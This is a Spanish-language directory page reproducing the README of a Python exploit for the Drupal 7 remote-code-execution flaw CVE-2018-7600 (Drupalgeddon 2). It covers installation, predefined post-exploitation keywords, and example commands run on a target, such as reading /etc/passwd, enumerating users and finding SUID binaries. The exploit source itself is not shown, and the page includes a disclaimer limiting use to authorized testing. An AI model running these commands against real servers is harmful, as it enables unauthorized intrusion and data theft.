Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Drupalgeddon2-CVE-2018-7600 — Exploit en Python para CVE-2018-7600 (Drupalgeddon 2) que permite ejecución remota de código en Drupal 7 con múltiples métodos de inyección y comandos predefinidos para Linux y Windows. | Kitploit
Herramientas/GitHubGitHub/bixipro/drupalgeddon2-cve-2018-7600
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlAprendizaje y Educación
GitHubbixipro/drupalgeddon2-cve-2018-7600

Drupalgeddon2-CVE-2018-7600

Exploit en Python para CVE-2018-7600 (Drupalgeddon 2) que permite ejecución remota de código en Drupal 7 con múltiples métodos de inyección y comandos predefinidos para Linux y Windows.

Ver Repositorio
hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🔥 Drupalgeddon 2 Exploit — bixi.py

📖 Descripción

bixi.py es un exploit para la vulnerabilidad CVE‑2018‑7600 (Drupalgeddon 2) que afecta a Drupal 7. Permite la ejecución remota de comandos (RCE) en servidores Drupal vulnerables mediante una interfaz intuitiva y comandos predefinidos.


⚠️ DISCLAIMER / AVISO LEGAL

ESTE SOFTWARE ES SOLO PARA FINES EDUCATIVOS Y DE INVESTIGACIÓN EN ENTORNOS CONTROLADOS.

  • Solo utilizar en sistemas que poseas o tengas permiso escrito para probar
  • El uso no autorizado es ILEGAL y puede resultar en consecuencias penales
  • El autor no se hace responsable del mal uso de esta herramienta
  • Cumple siempre con las leyes locales e internacionales de ciberseguridad

"With great power comes great responsibility"


📋 Características

  • ✅ Explotación automática de CVE‑2018‑7600
  • ✅ Comandos predefinidos para Linux y Windows
  • ✅ Múltiples métodos de inyección (, , , )
system
passthru
exec
shell_exec
  • ✅ Interfaz intuitiva con sistema de ayuda
  • ✅ Manejo robusto de errores y timeouts
  • ✅ Salida formateada y fácil de leer

  • 🚀 Instalación Rápida

    1. Clonar repositorio

    root@kitploit:~
    git clone https://github.com/bixiPRO/Drupalgeddon2-CVE-2018-7600.git
    cd Drupalgeddon2-CVE-2018-7600
    

    2. Instalar dependencias

    root@kitploit:~
    # Kali / Debian / Ubuntu
    sudo apt update
    sudo apt install python3 python3-pip -y
    pip3 install requests
    
    # Otras distribuciones
    pip3 install requests
    

    3. Dar permisos de ejecución

    root@kitploit:~
    chmod +x bixi.py
    

    🎯 Uso Básico

    Ver ayuda completa

    root@kitploit:~
    python3 bixi.py --help
    

    Sintaxis general

    root@kitploit:~
    python3 bixi.py <URL> <COMANDO/PALABRA_CLAVE> [INJECTION_TYPE]
    

    Ejemplos prácticos

    root@kitploit:~
    # Verificar vulnerabilidad
    python3 bixi.py http://10.99.99.6/drupal/ test
    
    # Detectar sistema operativo
    python3 bixi.py http://10.99.99.6/drupal/ linux
    python3 bixi.py http://10.99.99.6/drupal/ windows
    
    # Enumerar usuarios
    python3 bixi.py http://10.99.99.6/drupal/ users_linux
    python3 bixi.py http://10.99.99.6/drupal/ net_user
    
    # Información del sistema
    python3 bixi.py http://10.99.99.6/drupal/ ifconfig
    python3 bixi.py http://10.99.99.6/drupal/ ipconfig
    
    # Comandos personalizados
    python3 bixi.py http://10.99.99.6/drupal/ "cat /etc/passwd"
    python3 bixi.py http://10.99.99.6/drupal/ "whoami /all"
    

    📊 Palabras Clave Predefinidas

    🐧 Linux

    ComandoDescripción
    linuxInformación del sistema
    users_linuxListar usuarios
    idInfo de usuario/grupos
    lsListar archivos
    ifconfigInfo de red
    find_flagBuscar flags

    🪟 Windows

    ComandoDescripción
    windowsInformación del sistema
    net_userListar usuarios
    whoami_winInfo detallada
    ipconfigRed
    netstat_winConexiones
    dirListar directorio

    🔧 Pentesting

    ComandoDescripción
    sudoVerificar privilegios sudo
    suidBuscar binarios SUID
    net_localgroupGrupos locales
    drupal_configBuscar configuraciones
    drupal_versionObtener versión Drupal

    🎨 Métodos de Inyección

    root@kitploit:~
    # system (default)
    python3 bixi.py http://target/ "whoami" system
    
    # passthru
    python3 bixi.py http://target/ "whoami" passthru
    
    # exec
    python3 bixi.py http://target/ "whoami" exec
    
    # shell_exec
    python3 bixi.py http://target/ "whoami" shell_exec
    

    🏗️ Estructura del Proyecto

    root@kitploit:~
    drupalgeddon2-exploit/
    │
    ├── bixi.py
    ├── README.md
    ├── requirements.txt
    ├── examples/
    │   ├── linux_commands.txt
    │   └── windows_commands.txt
    └── screenshots/
        ├── help_screen.png
        └── exploit_success.png
    

    🔧 Configuración Avanzada

    Proxy (opcional)

    root@kitploit:~
    proxies = {
        'http': 'http://127.0.0.1:8080',
        'https': 'http://127.0.0.1:8080'
    }
    

    Timeout

    Modificar valor por defecto (15 segundos):

    root@kitploit:~
    timeout=15
    

    Añadir nuevos comandos

    Editar el diccionario commands en get_command_for_keyword()


    🐛 Solución de Problemas

    Error: No module named 'requests'

    root@kitploit:~
    pip3 install requests
    

    Error: Connection refused

    root@kitploit:~
    # Verificar conectividad
    ping TARGET_IP
    
    # Verificar ruta Drupal
    curl http://TARGET_IP/drupal/
    
    Descargar herramienta